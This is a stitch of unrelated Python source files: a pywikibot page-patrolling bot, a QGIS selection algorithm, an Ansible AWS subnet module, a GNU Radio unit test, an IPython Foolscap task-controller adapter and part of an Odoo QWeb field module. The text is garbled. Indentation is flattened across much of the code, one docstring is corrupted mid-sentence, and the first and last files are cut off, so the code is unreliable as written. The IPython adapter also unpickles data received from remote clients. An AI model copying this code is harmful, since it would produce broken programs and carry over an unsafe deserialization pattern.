if pywikibot.config.verbose_output:
pywikibot.output(u'not found')
def parse_page_tuples(self, wikitext, user=None):
"""Parse page details apart from 'user:' for use."""
tuples = {}
        # For any structure, the first 'user:' page encountered is
        # registered as the user that the rest of the structure
        # refers to.
def process_children(obj, current_user):
pywikibot.debug(u'Parsing node: %s' % obj, _logger)
for c in obj.children:
temp = process_node(c, current_user)
if temp and not current_user:
current_user = temp
def process_node(obj, current_user):
# links are analysed; interwiki links are included because mwlib
# incorrectly calls 'Wikisource:' namespace links an interwiki
if isinstance(obj, mwlib.parser.NamespaceLink) or \
isinstance(obj, mwlib.parser.InterwikiLink) or \
isinstance(obj, mwlib.parser.ArticleLink):
if obj.namespace == -1:
# the parser accepts 'special:prefixindex/' as a wildcard
                    # this allows a prefix that doesn't match an existing page
# to be a blue link, and can be clicked to see what pages
# will be included in the whitelist
if obj.target[:20].lower() == 'special:prefixindex/':
if len(obj.target) == 20:
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist everything')
page = ''
else:
page = obj.target[20:]
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist prefixindex hack '
u'for: %s' % page)
# p = pywikibot.Page(self.site, obj.target[20:])
# obj.namespace = p.namespace
# obj.target = p.title()
elif obj.namespace == 2 and not current_user:
# if a target user hasn't been found yet, and the link is
# 'user:'
# the user will be the target of subsequent rules
page_prefix_len = len(self.site.namespace(2))
current_user = obj.target[(page_prefix_len + 1):]
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist user: %s' % current_user)
return current_user
else:
page = obj.target
if current_user:
if not user or current_user == user:
if self.is_wikisource_author_page(page):
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist author: %s' % page)
author = LinkedPagesRule(page)
self.add_to_tuples(tuples, current_user, author)
else:
if pywikibot.config.verbose_output:
pywikibot.output(u'Whitelist page: %s' % page)
self.add_to_tuples(tuples, current_user, page)
elif pywikibot.config.verbose_output:
pywikibot.output(u'Discarding whitelist page for '
u'another user: %s' % page)
else:
raise Exception(u'No user set for page %s' % page)
else:
process_children(obj, current_user)
root = mwlib.uparser.parseString(title='Not used', raw=wikitext)
process_children(root, None)
return tuples
def is_wikisource_author_page(self, title):
"""Initialise author_ns if site family is 'wikisource' else pass."""
if self.site.family.name != 'wikisource':
return
author_ns = 0
try:
author_ns = self.site.family.authornamespaces[self.site.lang][0]
except:
pass
if author_ns:
author_ns_prefix = self.site.namespace(author_ns)
pywikibot.debug(u'Author ns: %d; name: %s'
% (author_ns, author_ns_prefix), _logger)
if title.find(author_ns_prefix + ':') == 0:
if pywikibot.config.verbose_output:
author_page_name = title[len(author_ns_prefix) + 1:]
pywikibot.output(u'Found author %s' % author_page_name)
return True
def run(self, feed=None):
"""Process 'whitelist' page absent in generator."""
if self.whitelist is None:
self.load_whitelist()
if not feed:
feed = self.getOption('feed')
for page in feed:
self.treat(page)
def treat(self, page):
"""It loads the given page, does some changes, and saves it."""
choice = False
try:
# page: title, date, username, comment, loginfo, rcid, token
username = page['user']
            # when the feed isn't from the API, it used to contain
# '(not yet written)' or '(page does not exist)' when it was
# a redlink
rcid = page['rcid']
title = page['title']
if not rcid:
raise Exception('rcid not present')
# check whether we have wrapped around to higher rcids
# which indicates a new RC feed is being processed
if rcid > self.last_rcid:
# refresh the whitelist
self.load_whitelist()
self.repeat_start_ts = time.time()
if pywikibot.config.verbose_output or self.getOption('ask'):
pywikibot.output(u'User %s has created or modified page %s'
% (username, title))
if self.getOption('autopatroluserns') and (page['ns'] == 2 or
page['ns'] == 3):
# simple rule to whitelist any user editing their own userspace
if title.partition(':')[2].split('/')[0].startswith(username):
if pywikibot.config.verbose_output:
pywikibot.output(u'%s is whitelisted to modify %s'
% (username, title))
choice = True
if not choice and username in self.whitelist:
if self.in_list(self.whitelist[username], title):
if pywikibot.config.verbose_output:
pywikibot.output(u'%s is whitelisted to modify %s'
% (username, title))
choice = True
if self.getOption('ask'):
choice = pywikibot.input_yn(
u'Do you want to mark page as patrolled?', automatic_quit=False)
# Patrol the page
if choice:
# list() iterates over patrol() which returns a generator
list(self.site.patrol(rcid))
self.patrol_counter = self.patrol_counter + 1
pywikibot.output(u'Patrolled %s (rcid %d) by user %s'
% (title, rcid, username))
else:
if pywikibot.config.verbose_output:
pywikibot.output(u'Skipped')
if rcid > self.highest_rcid:
self.highest_rcid = rcid
self.last_rcid = rcid
self.rc_item_counter = self.rc_item_counter + 1
        except pywikibot.NoPage:
            pywikibot.output(u'Page %s does not exist; skipping.' % title)
        except pywikibot.IsRedirectPage:
            pywikibot.output(u'Page %s is a redirect; skipping.' % title)
def title_match(prefix, title):
"""Match title substring with given prefix."""
if pywikibot.config.verbose_output:
pywikibot.output(u'Matching %s to prefix %s' % (title, prefix))
if title.startswith(prefix):
if pywikibot.config.verbose_output:
pywikibot.output(u'substr match')
return True
return
class PatrolRule(object):
"""Bot marks the edit.startswith("-s as patrolled based on info obtained by whitelist."""
def __init__(self, page_title):
"""
Constructor.
@param page_title: The page title for this rule
@type page_title: pywikibot.Page
"""
self.page_title = page_title
def title(self):
"""Obtain page title."""
return self.page_title
def match(self, page):
"""Added for future use."""
pass
class LinkedPagesRule(PatrolRule):
"""Matches of page site title and linked pages title."""
def __init__(self, page_title):
"""Constructor.
@param page_title: The page title for this rule
@type page_title: pywikibot.Page
"""
self.site = pywikibot.Site()
self.page_title = page_title
self.linkedpages = None
def match(self, page_title):
"""Match page_title to linkedpages elements."""
if page_title == self.page_title:
return True
        if self.site.family.name != 'wikisource':
raise Exception('This is a wikisource rule')
if not self.linkedpages:
if pywikibot.config.verbose_output:
pywikibot.output(u'loading page links on %s' % self.page_title)
p = pywikibot.Page(self.site, self.page_title)
linkedpages = list()
for linkedpage in p.linkedPages():
linkedpages.append(linkedpage.title())
self.linkedpages = linkedpages
if pywikibot.config.verbose_output:
pywikibot.output(u'Loaded %d page links' % len(linkedpages))
for p in self.linkedpages:
if pywikibot.config.verbose_output:
pywikibot.output(u"Checking against '%s'" % p)
if title_match(p, page_title):
if pywikibot.config.verbose_output:
pywikibot.output(u'Matched.')
return p
def api_feed_repeater(gen, delay=0, repeat=False, number=1000, namespaces=None,
user=None, recent_new_gen=True):
"""Generator which loads pages details to be processed."""
while True:
if recent_new_gen:
generator = gen(step=number, namespaces=namespaces, user=user,
showPatrolled=False)
else:
generator = gen(step=number, namespaces=namespaces, user=user,
returndict=True, showPatrolled=False)
for page in generator:
if recent_new_gen:
yield page
else:
yield page[1]
if repeat:
pywikibot.output(u'Sleeping for %d seconds' % delay)
time.sleep(delay)
else:
break
def main(*args):
"""Process command line arguments and invoke PatrolBot."""
# This factory is responsible for processing command line arguments
# that are also used by other scripts and that determine on which pages
# to work on.
usercontribs = None
gen = None
recentchanges = False
newpages = False
repeat = False
genFactory = pagegenerators.GeneratorFactory()
options = {}
# Parse command line arguments
for arg in pywikibot.handle_args(args):
if arg.startswith('-ask'):
options['ask'] = True
elif arg.startswith('-autopatroluserns'):
options['autopatroluserns'] = True
elif arg.startswith('-repeat'):
repeat = True
elif arg.startswith('-newpages'):
newpages = True
elif arg.startswith('-recentchanges'):
recentchanges = True
elif arg.startswith('-usercontribs:'):
usercontribs = arg[14:]
elif arg.startswith('-versionchecktime:'):
versionchecktime = arg[len('-versionchecktime:'):]
options['versionchecktime'] = int(versionchecktime)
elif arg.startswith("-whitelist:"):
options['whitelist'] = arg[len('-whitelist:'):]
else:
generator = genFactory.handleArg(arg)
if not generator:
if ':' in arg:
m = arg.split(':')
options[m[0]] = m[1]
site = pywikibot.Site()
site.login()
if usercontribs:
pywikibot.output(u'Processing user: %s' % usercontribs)
newpage_count = 300
if not newpages and not recentchanges and not usercontribs:
if site.family.name == 'wikipedia':
newpages = True
newpage_count = 5000
else:
recentchanges = True
bot = PatrolBot(**options)
if newpages or usercontribs:
pywikibot.output(u'Newpages:')
gen = site.newpages
feed = api_feed_repeater(gen, delay=60, repeat=repeat,
number=newpage_count, user=usercontribs,
namespaces=genFactory.namespaces,
recent_new_gen=False)
bot.run(feed)
if recentchanges or usercontribs:
pywikibot.output(u'Recentchanges:')
gen = site.recentchanges
feed = api_feed_repeater(gen, delay=60, repeat=repeat, number=1000,
namespaces=genFactory.namespaces,
user=usercontribs)
bot.run(feed)
pywikibot.output(u'%d/%d patrolled'
% (bot.patrol_counter, bot.rc_item_counter))
if __name__ == '__main__':
main()
|
"""
***************************************************************************
SelectByExpression.py
---------------------
Date : July 2014
Copyright : (C) 2014 by Michaël Douchin
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Douchin'
__date__ = 'July 2014'
__copyright__ = '(C) 2014, Michael Douchin'
__revision__ = '$Format:%H$'
import processing
from qgis.core import QgsExpression, QgsFeatureRequest
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterString
class SelectByExpression(GeoAlgorithm):
LAYERNAME = 'LAYERNAME'
    EXPRESSION = 'EXPRESSION'
RESULT = 'RESULT'
METHOD = 'METHOD'
METHODS = ['creating new selection', 'adding to current selection',
'removing from current selection']
def defineCharacteristics(self):
self.name = 'Select by expression'
self.group = 'Vector selection tools'
self.addParameter(ParameterVector(self.LAYERNAME,
self.tr('Input Layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterString(self.EXPRESSION,
self.tr("Expression")))
self.addParameter(ParameterSelection(self.METHOD,
self.tr('Modify current selection by'), self.METHODS, 0))
self.addOutput(OutputVector(self.RESULT, self.tr('Output'), True))
def processAlgorithm(self, progress):
filename = self.getParameterValue(self.LAYERNAME)
layer = processing.getObject(filename)
oldSelection = set(layer.selectedFeaturesIds())
method = self.getParameterValue(self.METHOD)
# Build QGIS request with expression
expression = self.getParameterValue(self.EXPRESSION)
qExp = QgsExpression(expression)
if not qExp.hasParserError():
qReq = QgsFeatureRequest(qExp)
else:
raise GeoAlgorithmExecutionException(qExp.parserErrorString())
selected = [f.id() for f in layer.getFeatures(qReq)]
if method == 1:
selected = list(oldSelection.union(selected))
elif method == 2:
selected = list(oldSelection.difference(selected))
# Set the selection
layer.setSelectedFeatures(selected)
self.setOutputValue(self.RESULT, filename)
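# A pure-Python sketch (not part of the algorithm) of the METHOD handling in
# processAlgorithm() above: method 0 replaces the selection, 1 unions the new
# matches with the old selection, 2 subtracts them from it:
#
#     >>> old_selection, matches = {1, 2, 3}, [3, 4]
#     >>> sorted(matches)                            # creating new selection
#     [3, 4]
#     >>> sorted(old_selection.union(matches))       # adding to current selection
#     [1, 2, 3, 4]
#     >>> sorted(old_selection.difference(matches))  # removing from current selection
#     [1, 2]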
|
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: ec2_vpc_subnet_facts
short_description: Gather facts about ec2 VPC subnets in AWS
description:
- Gather facts about ec2 VPC subnets in AWS
version_added: "2.1"
author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSubnets.html) for possible filters.
required: false
default: null
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Gather facts about all VPC subnets
- ec2_vpc_subnet_facts:
# Gather facts about a particular VPC subnet using ID
- ec2_vpc_subnet_facts:
    filters:
      subnet-id: subnet-00112233
# Gather facts about any VPC subnet with a tag key Name and value Example
- ec2_vpc_subnet_facts:
    filters:
      "tag:Name": Example
# Gather facts about any VPC subnet within VPC with ID vpc-abcdef00
- ec2_vpc_subnet_facts:
    filters:
      vpc-id: vpc-abcdef00
# Gather facts about a set of VPC subnets, publicA, publicB and publicC within
# VPC vpc-abcdef00, then use the gathered facts to build a list of subnet ids
- ec2_vpc_subnet_facts:
    filters:
      vpc-id: vpc-abcdef00
      "tag:Name": "{{ item }}"
  with_items:
    - publicA
    - publicB
    - publicC
  register: subnet_facts
- set_fact:
subnet_ids: "{{ subnet_facts.results|map(attribute='subnets.0.id')|list }}"
'''
try:
import boto.vpc
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AnsibleAWSError, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def get_subnet_info(subnet):
subnet_info = { 'id': subnet.id,
'availability_zone': subnet.availability_zone,
'available_ip_address_count': subnet.available_ip_address_count,
'cidr_block': subnet.cidr_block,
'default_for_az': subnet.defaultForAz,
'map_public_ip_on_launch': subnet.mapPublicIpOnLaunch,
'state': subnet.state,
'tags': subnet.tags,
'vpc_id': subnet.vpc_id
}
return subnet_info
def list_ec2_vpc_subnets(connection, module):
filters = module.params.get("filters")
subnet_dict_array = []
try:
all_subnets = connection.get_all_subnets(filters=filters)
except BotoServerError as e:
module.fail_json(msg=e.message)
for subnet in all_subnets:
subnet_dict_array.append(get_subnet_info(subnet))
module.exit_json(subnets=subnet_dict_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters = dict(default=None, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
list_ec2_vpc_subnets(connection, module)
if __name__ == '__main__':
main()
|
from gnuradio import gr, gr_unittest, digital, blocks
class test_lms_dd_equalizer(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def transform(self, src_data, gain, const):
SRC = blocks.vector_source_c(src_data, False)
EQU = digital.lms_dd_equalizer_cc(4, gain, 1, const.base())
DST = blocks.vector_sink_c()
self.tb.connect(SRC, EQU, DST)
self.tb.run()
return DST.data()
def test_001_identity(self):
# Constant modulus signal so no adjustments
const = digital.constellation_qpsk()
src_data = const.points()*1000
N = 100 # settling time
expected_data = src_data[N:]
result = self.transform(src_data, 0.1, const)[N:]
N = -500
self.assertComplexTuplesAlmostEqual(expected_data[N:], result[N:], 5)
if __name__ == "__main__":
gr_unittest.run(test_lms_dd_equalizer, "test_lms_dd_equalizer.xml")
|
"""A Foolscap interface to a TaskController.
This class lets Foolscap clients talk to a TaskController.
"""
__docformat__ = "restructuredtext en"
import cPickle as pickle
import xmlrpclib, copy
from zope.interface import Interface, implements
from twisted.internet import defer
from twisted.python import components, failure
from foolscap import Referenceable
from IPython.kernel.twistedutil import blockingCallFromThread
from IPython.kernel import error, task as taskmodule, taskclient
from IPython.kernel.pickleutil import can, uncan
from IPython.kernel.clientinterfaces import (
IFCClientInterfaceProvider,
IBlockingClientAdaptor
)
from IPython.kernel.mapper import (
TaskMapper,
ITaskMapperFactory,
IMapper
)
from IPython.kernel.parallelfunction import (
ParallelFunction,
ITaskParallelDecorator
)
class IFCTaskController(Interface):
"""Foolscap interface to task controller.
See the documentation of `ITaskController` for more information.
"""
def remote_run(binTask):
""""""
def remote_abort(taskid):
""""""
def remote_get_task_result(taskid, block=False):
""""""
def remote_barrier(taskids):
""""""
def remote_spin():
""""""
def remote_queue_status(verbose):
""""""
def remote_clear():
""""""
class FCTaskControllerFromTaskController(Referenceable):
"""
Adapt a `TaskController` to an `IFCTaskController`
This class is used to expose a `TaskController` over the wire using
the Foolscap network protocol.
"""
implements(IFCTaskController, IFCClientInterfaceProvider)
def __init__(self, taskController):
self.taskController = taskController
#---------------------------------------------------------------------------
# Non interface methods
#---------------------------------------------------------------------------
def packageFailure(self, f):
f.cleanFailure()
return self.packageSuccess(f)
def packageSuccess(self, obj):
serial = pickle.dumps(obj, 2)
return serial
#---------------------------------------------------------------------------
# ITaskController related methods
#---------------------------------------------------------------------------
def remote_run(self, ptask):
try:
task = pickle.loads(ptask)
task.uncan_task()
except:
d = defer.fail(pickle.UnpickleableError("Could not unmarshal task"))
else:
d = self.taskController.run(task)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_abort(self, taskid):
d = self.taskController.abort(taskid)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_get_task_result(self, taskid, block=False):
d = self.taskController.get_task_result(taskid, block)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_barrier(self, taskids):
d = self.taskController.barrier(taskids)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_spin(self):
d = self.taskController.spin()
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_queue_status(self, verbose):
d = self.taskController.queue_status(verbose)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_clear(self):
return self.taskController.clear()
def remote_get_client_name(self):
return 'IPython.kernel.taskfc.FCTaskClient'
components.registerAdapter(FCTaskControllerFromTaskController,
taskmodule.ITaskController, IFCTaskController)
class FCTaskClient(object):
"""
Client class for Foolscap exposed `TaskController`.
This class is an adapter that makes a `RemoteReference` to a
`TaskController` look like an actual `ITaskController` on the client side.
This class also implements `IBlockingClientAdaptor` so that clients can
automatically get a blocking version of this class.
"""
implements(
taskmodule.ITaskController,
IBlockingClientAdaptor,
ITaskMapperFactory,
IMapper,
ITaskParallelDecorator
)
def __init__(self, remote_reference):
self.remote_reference = remote_reference
#---------------------------------------------------------------------------
# Non interface methods
#---------------------------------------------------------------------------
def unpackage(self, r):
return pickle.loads(r)
#---------------------------------------------------------------------------
# ITaskController related methods
#---------------------------------------------------------------------------
def run(self, task):
"""Run a task on the `TaskController`.
See the documentation of the `MapTask` and `StringTask` classes for
details on how to build a task of different types.
:Parameters:
task : an `ITask` implementer
:Returns: The int taskid of the submitted task. Pass this to
`get_task_result` to get the `TaskResult` object.
"""
assert isinstance(task, taskmodule.BaseTask), "task must be a Task object!"
task.can_task()
ptask = pickle.dumps(task, 2)
task.uncan_task()
d = self.remote_reference.callRemote('run', ptask)
d.addCallback(self.unpackage)
return d
def get_task_result(self, taskid, block=False):
"""
Get a task result by taskid.
:Parameters:
taskid : int
The taskid of the task to be retrieved.
block : boolean
Should I block until the task is done?
:Returns: A `TaskResult` object that encapsulates the task result.
"""
d = self.remote_reference.callRemote('get_task_result', taskid, block)
d.addCallback(self.unpackage)
return d
def abort(self, taskid):
"""
Abort a task by taskid.
:Parameters:
taskid : int
The taskid of the task to be aborted.
"""
d = self.remote_reference.callRemote('abort', taskid)
d.addCallback(self.unpackage)
return d
def barrier(self, taskids):
"""Block until a set of tasks are completed.
:Parameters:
taskids : list, tuple
A sequence of taskids to block on.
"""
d = self.remote_reference.callRemote('barrier', taskids)
d.addCallback(self.unpackage)
return d
def spin(self):
"""
Touch the scheduler, to resume scheduling without submitting a task.
This method only needs to be called in unusual situations where the
scheduler is idle for some reason.
"""
d = self.remote_reference.callRemote('spin')
d.addCallback(self.unpackage)
return d
def queue_status(self, verbose=False):
"""
Get a dictionary with the current state of the task queue.
:Parameters:
verbose : boolean
If True, return a list of taskids. If False, simply give
the number of tasks with each status.
:Returns:
A dict with the queue status.
"""
d = self.remote_reference.callRemote('queue_status', verbose)
d.addCallback(self.unpackage)
return d
def clear(self):
"""
Clear all previously run tasks from the task controller.
        This is needed because the task controller keeps all task results
        in memory. This can be a problem if there are many completed
tasks. Users should call this periodically to clean out these
cached task results.
"""
d = self.remote_reference.callRemote('clear')
return d
def adapt_to_blocking_client(self):
"""
        Wrap self in a blocking version that implements `IBlockingTaskClient`.
"""
from IPython.kernel.taskclient import IBlockingTaskClient
return IBlockingTaskClient(self)
def map(self, func, *sequences):
"""
Apply func to *sequences elementwise. Like Python's builtin map.
This version is load balanced.
"""
return self.mapper().map(func, *sequences)
def mapper(self, clear_before=False, clear_after=False, retries=0,
recovery_task=None, depend=None, block=True):
"""
Create an `IMapper` implementer with a given set of arguments.
The `IMapper` created using a task controller is load balanced.
See the documentation for `IPython.kernel.task.BaseTask` for
documentation on the arguments to this method.
"""
return TaskMapper(self, clear_before=clear_before,
clear_after=clear_after, retries=retries,
recovery_task=recovery_task, depend=depend, block=block)
def parallel(self, clear_before=False, clear_after=False, retries=0,
recovery_task=None, depend=None, block=True):
mapper = self.mapper(clear_before, clear_after, retries,
recovery_task, depend, block)
pf = ParallelFunction(mapper)
return pf
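# A minimal usage sketch, not part of the module: once adapted to a blocking
# client, the mapper/parallel helpers above act like load-balanced versions
# of their builtins. Obtaining `fc_task_client` via the usual Foolscap
# connection machinery is assumed to happen elsewhere.
#   blocking_tc = fc_task_client.adapt_to_blocking_client()
#   squares = blocking_tc.map(lambda x: x * x, range(10))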
|
"""
Web_editor-context rendering needs to add some metadata to rendered fields to
allow editing them, as well as render a few fields differently.
Also, adds methods to convert values back to Odoo models.
"""
import ast
import base64
import io
import itertools
import json
import logging
import os
import re
import hashlib
import pytz
import requests
from dateutil import parser
from lxml import etree, html
from PIL import Image as I
from werkzeug import urls
import odoo.modules
from odoo import api, models, fields
from odoo.tools import ustr, pycompat
from odoo.tools import html_escape as escape
from odoo.addons.base.ir import ir_qweb
REMOTE_CONNECTION_TIMEOUT = 2.5
logger = logging.getLogger(__name__)
class QWeb(models.AbstractModel):
""" QWeb object for rendering editor stuff
"""
_inherit = 'ir.qweb'
# compile directives
def _compile_directive_snippet(self, el, options):
el.set('t-call', el.attrib.pop('t-snippet'))
name = self.env['ir.ui.view'].search([('key', '=', el.attrib.get('t-call'))]).display_name
thumbnail = el.attrib.pop('t-thumbnail', "oe-thumbnail")
div = u'<div name="%s" data-oe-type="snippet" data-oe-thumbnail="%s">' % (
escape(pycompat.to_text(name)),
escape(pycompat.to_text(thumbnail))
)
return [self._append(ast.Str(div))] + self._compile_node(el, options) + [self._append(ast.Str(u'</div>'))]
def _compile_directive_install(self, el, options):
if self.user_has_groups('base.group_system'):
module = self.env['ir.module.module'].search([('name', '=', el.attrib.get('t-install'))])
if not module or module.state == 'installed':
return []
name = el.attrib.get('string') or 'Snippet'
thumbnail = el.attrib.pop('t-thumbnail', 'oe-thumbnail')
div = u'<div name="%s" data-oe-type="snippet" data-module-id="%s" data-oe-thumbnail="%s"><section/></div>' % (
escape(pycompat.to_text(name)),
module.id,
escape(pycompat.to_text(thumbnail))
)
return [self._append(ast.Str(div))]
else:
return []
def _compile_directive_tag(self, el, options):
if el.get('t-placeholder'):
el.set('t-att-placeholder', el.attrib.pop('t-placeholder'))
return super(QWeb, self)._compile_directive_tag(el, options)
# order and ignore
def _directives_eval_order(self):
directives = super(QWeb, self)._directives_eval_order()
directives.insert(directives.index('call'), 'snippet')
directives.insert(directives.index('call'), 'install')
return directives
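# Hedged template sketch, not part of this file: view XML (the snippet and
# module names are assumptions) exercising the t-snippet/t-install directives
# compiled above.
#   <t t-snippet="web_editor.s_text_block" t-thumbnail="/module/static/thumb.png"/>
#   <t t-install="website_blog" string="Blog" t-thumbnail="/module/static/thumb.png"/>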
class Field(models.AbstractModel):
_name = 'ir.qweb.field'
_inherit = 'ir.qweb.field'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Field, self).attributes(record, field_name, options, values)
field = record._fields[field_name]
placeholder = options.get('placeholder') or getattr(field, 'placeholder', None)
if placeholder:
attrs['placeholder'] = placeholder
if options['translate'] and field.type in ('char', 'text'):
name = "%s,%s" % (record._name, field_name)
domain = [('name', '=', name), ('res_id', '=', record.id), ('type', '=', 'model'), ('lang', '=', options.get('lang'))]
translation = record.env['ir.translation'].search(domain, limit=1)
attrs['data-oe-translation-state'] = translation and translation.state or 'to_translate'
return attrs
def value_from_string(self, value):
return value
@api.model
def from_html(self, model, field, element):
return self.value_from_string(element.text_content().strip())
class Integer(models.AbstractModel):
_name = 'ir.qweb.field.integer'
_inherit = 'ir.qweb.field.integer'
value_from_string = int
class Float(models.AbstractModel):
_name = 'ir.qweb.field.float'
_inherit = 'ir.qweb.field.float'
@api.model
def from_html(self, model, field, element):
lang = self.user_lang()
value = element.text_content().strip()
return float(value.replace(lang.thousands_sep, '')
.replace(lang.decimal_point, '.'))
class ManyToOne(models.AbstractModel):
_name = 'ir.qweb.field.many2one'
_inherit = 'ir.qweb.field.many2one'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(ManyToOne, self).attributes(record, field_name, options, values)
many2one = getattr(record, field_name)
if many2one:
attrs['data-oe-many2one-id'] = many2one.id
attrs['data-oe-many2one-model'] = many2one._name
return attrs
@api.model
def from_html(self, model, field, element):
Model = self.env[element.get('data-oe-model')]
id = int(element.get('data-oe-id'))
M2O = self.env[field.comodel_name]
field_name = element.get('data-oe-field')
many2one_id = int(element.get('data-oe-many2one-id'))
record = many2one_id and M2O.browse(many2one_id)
if record and record.exists():
# save the new id of the many2one
Model.browse(id).write({field_name: many2one_id})
# not necessary, but might as well be explicit about it
return None
class Contact(models.AbstractModel):
_name = 'ir.qweb.field.contact'
_inherit = 'ir.qweb.field.contact'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Contact, self).attributes(record, field_name, options, values)
attrs['data-oe-contact-options'] = json.dumps(options)
return attrs
# helper to call the rendering of contact field
@api.model
def get_record_to_html(self, ids, options=None):
return self.value_to_html(self.env['res.partner'].browse(ids[0]), options=options)
class Date(models.AbstractModel):
_name = 'ir.qweb.field.date'
_inherit = 'ir.qweb.field.date'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Date, self).attributes(record, field_name, options, values)
attrs['data-oe-original'] = record[field_name]
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
if not value:
return False
return value
class DateTime(models.AbstractModel):
_name = 'ir.qweb.field.datetime'
_inherit = 'ir.qweb.field.datetime'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(DateTime, self).attributes(record, field_name, options, values)
value = record[field_name]
if isinstance(value, pycompat.string_types):
value = fields.Datetime.from_string(value)
if value:
# convert from UTC (server timezone) to user timezone
value = fields.Datetime.context_timestamp(self, timestamp=value)
value = fields.Datetime.to_string(value)
attrs['data-oe-original'] = value
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
if not value:
return False
# parse from string to datetime
dt = parser.parse(value)
# convert back from user's timezone to UTC
tz_name = self.env.context.get('tz') or self.env.user.tz
if tz_name:
try:
user_tz = pytz.timezone(tz_name)
utc = pytz.utc
dt = user_tz.localize(dt).astimezone(utc)
except Exception:
logger.warn(
"Failed to convert the value for a field of the model"
" %s back from the user's timezone (%s) to UTC",
model, tz_name,
exc_info=True)
# format back to string
return fields.Datetime.to_string(dt)
class Text(models.AbstractModel):
_name = 'ir.qweb.field.text'
_inherit = 'ir.qweb.field.text'
@api.model
def from_html(self, model, field, element):
return html_to_text(element)
class Selection(models.AbstractModel):
_name = 'ir.qweb.field.selection'
_inherit = 'ir.qweb.field.selection'
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
selection = field.get_description(self.env)['selection']
for k, v in selection:
if isinstance(v, str):
v = ustr(v)
if value == v:
return k
raise ValueError(u"No value found for label %s in selection %s" % (
value, selection))
class HTML(models.AbstractModel):
_name = 'ir.qweb.field.html'
_inherit = 'ir.qweb.field.html'
@api.model
def from_html(self, model, field, element):
content = []
if element.text:
content.append(element.text)
content.extend(html.tostring(child, encoding='unicode')
for child in element.iterchildren(tag=etree.Element))
return '\n'.join(content)
class Image(models.AbstractModel):
"""
Widget options:
``class``
set as attribute on the generated <img> tag
"""
_name = 'ir.qweb.field.image'
_inherit = 'ir.qweb.field.image'
local_url_re = re.compile(r'^/(?P<module>[^]]+)/static/(?P<rest>.+)$')
@api.model
def from_html(self, model, field, element):
url = element.find('img').get('src')
url_object = urls.url_parse(url)
if url_object.path.startswith('/web/image'):
# url might be /web/image/<model>/<id>[_<checksum>]/<field>[/<width>x<height>]
fragments = url_object.path.split('/')
query = url_object.decode_query()
if fragments[3].isdigit():
model = 'ir.attachment'
oid = fragments[3]
field = 'datas'
else:
model = query.get('model', fragments[3])
oid = query.get('id', fragments[4].split('_')[0])
field = query.get('field', fragments[5])
item = self.env[model].browse(int(oid))
return item[field]
if self.local_url_re.match(url_object.path):
return self.load_local_url(url)
return self.load_remote_url(url)
def load_local_url(self, url):
match = self.local_url_re.match(urls.url_parse(url).path)
rest = match.group('rest')
for sep in os.sep, os.altsep:
            if sep and sep != '/':
                # str.replace returns a new string, so keep the result
                rest = rest.replace(sep, '/')
path = odoo.modules.get_module_resource(
match.group('module'), 'static', *(rest.split('/')))
if not path:
return None
try:
with open(path, 'rb') as f:
# force complete image load to ensure it's valid image data
image = I.open(f)
image.load()
f.seek(0)
return base64.b64encode(f.read())
except Exception:
logger.exception("Failed to load local image %r", url)
return None
def load_remote_url(self, url):
try:
# should probably remove remote URLs entirely:
# * in fields, downloading them without blowing up the server is a
# challenge
# * in views, may trigger mixed content warnings if HTTPS CMS
# linking to HTTP images
# implement drag & drop image upload to mitigate?
req = requests.get(url, timeout=REMOTE_CONNECTION_TIMEOUT)
# PIL needs a seekable file-like image so wrap result in IO buffer
image = I.open(io.BytesIO(req.content))
# force a complete load of the image data to validate it
image.load()
except Exception:
logger.exception("Failed to load remote image %r", url)
return None
# don't use original data in case weird stuff was smuggled in, with
# luck PIL will remove some of it?
out = io.BytesIO()
image.save(out, image.format)
return base64.b64encode(out.getvalue())
class Monetary(models.AbstractModel):
_name = 'ir.qweb.field.monetary'
_inherit = 'ir.qweb.field.monetary'
@api.model
